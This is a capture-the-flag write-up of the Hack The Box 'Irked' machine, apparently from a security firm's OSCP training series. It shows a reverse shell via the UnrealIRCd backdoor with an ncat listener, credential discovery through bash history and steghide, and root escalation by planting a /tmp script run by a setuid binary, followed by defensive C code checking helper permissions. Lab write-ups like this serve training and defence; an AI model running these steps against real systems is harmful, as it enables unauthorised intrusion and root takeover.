Road to OSCP - Hack The Box Write Up - Irked

2 May 2019

Hack the Box is an online platform to test and advance your skills in penetration testing and cyber security.

In this series of articles we show how junior evaluators complete some Hack The Box machines on their road to OSCP, a well-known and respected certification that is required for many top cybersecurity positions. Certified OSCPs are able to identify existing vulnerabilities and execute organized attacks in a controlled and focused manner. They can leverage or modify existing exploit code to their advantage, perform network pivoting and data exfiltration, and compromise systems due to poor configurations.

Let's start with the fun!

Irked

Initial Foothold

After enumerating all ports we see that there is an IRC server: UnrealIRCd.

We do not know the version, but we can still try to exploit it. There is a backdoor for version 3.2.8.1. We can use this script to exploit it:

  1. Inside the script, set the local IP and port.
  2. Set up the listener: ncat -lnvp 6969.
  3. Launch the exploit: python3 exploit.py 10.10.10.117 6697 -payload python.

We get a shell as ircd.

User

We can look at /home/ircd/.bash_history (truncated output):

cd /var/www/html
ls
cd /tmp
sudo -i
cd /home/ircd
clear
ls
ls -lah
cd ..
ls
cd djmardov
ls
cd Documents
ls -lah
cat .backup
clear
exit

A file called .backup, very suspicious. Found it, /home/djmardov/Documents/.backup:

Super elite steg backup pw
UPupDOWNdownLRlrBAbaSSss

We have a password: UPupDOWNdownLRlrBAbaSSss. Since it says steg, I think it will be the steghide password for the image found on the website.

I was right:

  1. Download image: wget http://10.10.10.117/irked.jpg.
  2. Extract hidden file: steghide extract -sf irked.jpg.

We get a file called pass.txt with the following contents: Kab6h+m+bbp2J:HG, which looks like a password. We can use it to SSH as user djmardov: ssh djmardov@10.10.10.117

Root

There is a suspicious setuid file: /usr/bin/viewuser. When running it, it looks for a file called /tmp/listusers.

If we create the file, it complains with this error: sh: 1: /tmp/listusers: Permission denied. It looks like it is trying to execute the file with /bin/sh.

So, if we just write the following lines to the file /tmp/listusers:

#!/bin/bash
bash

Then do chmod +x /tmp/listusers and run the binary viewuser, we get a shell as root.
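
The root cause here is a setuid program executing a helper from the world-writable /tmp directory. The following is an added example, not code from viewuser or from the original write-up, of a check a privileged program could make before running a helper; the function names are hypothetical, and the demo in main uses a constructed temporary directory with the current user standing in for root.

```c
#define _XOPEN_SOURCE 700
#include <libgen.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* 1 if the object is owned by `owner` and not writable by group or others. */
static int owner_only_writable(const struct stat *st, uid_t owner)
{
    return st->st_uid == owner && (st->st_mode & (S_IWGRP | S_IWOTH)) == 0;
}

/* Hypothetical pre-exec check (the name is ours, not taken from viewuser):
 * the helper must be a regular file, not a symlink, and both it and its
 * parent directory must be writable only by `owner`. 1 = trusted, 0 = not. */
int helper_is_trusted(const char *path, uid_t owner)
{
    struct stat st;
    char buf[PATH_MAX];
    if (strlen(path) >= sizeof buf)
        return 0;
    if (lstat(path, &st) != 0 || !S_ISREG(st.st_mode) ||
        !owner_only_writable(&st, owner))
        return 0;
    strcpy(buf, path);              /* dirname() may modify its argument */
    if (stat(dirname(buf), &st) != 0 || !S_ISDIR(st.st_mode))
        return 0;
    return owner_only_writable(&st, owner);
}

int main(void)
{
    /* Constructed fixture: a private temp dir plays the root-owned directory. */
    char dir[] = "/tmp/helperchkXXXXXX", file[PATH_MAX];
    FILE *f;
    if (mkdtemp(dir) == NULL) return 1;
    snprintf(file, sizeof file, "%s/listusers", dir);
    if ((f = fopen(file, "w")) == NULL) return 1;
    fclose(f);
    chmod(file, 0755);
    printf("private directory:        %d\n", helper_is_trusted(file, geteuid()));
    chmod(dir, 0777);               /* now as open as /tmp */
    printf("world-writable directory: %d\n", helper_is_trusted(file, geteuid()));
    unlink(file);
    return rmdir(dir);
}
```

Only the immediate parent directory is checked, and checking a path before executing it leaves a window between check and use; a production version would verify every ancestor directory and execute through an already opened file descriptor.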

Ángel Guzmán/Junior evaluator

Degree and Master's in telecommunications from the University of Granada, specialized in telematics. Joined jtsec in November of 2019 as a Junior cybersecurity evaluator.

Since he joined jtsec, he has participated in several internal hardware hacking projects, while also receiving training about the LINCE certification.

His main motivation is to learn, from small tools for his daily work to new technologies.

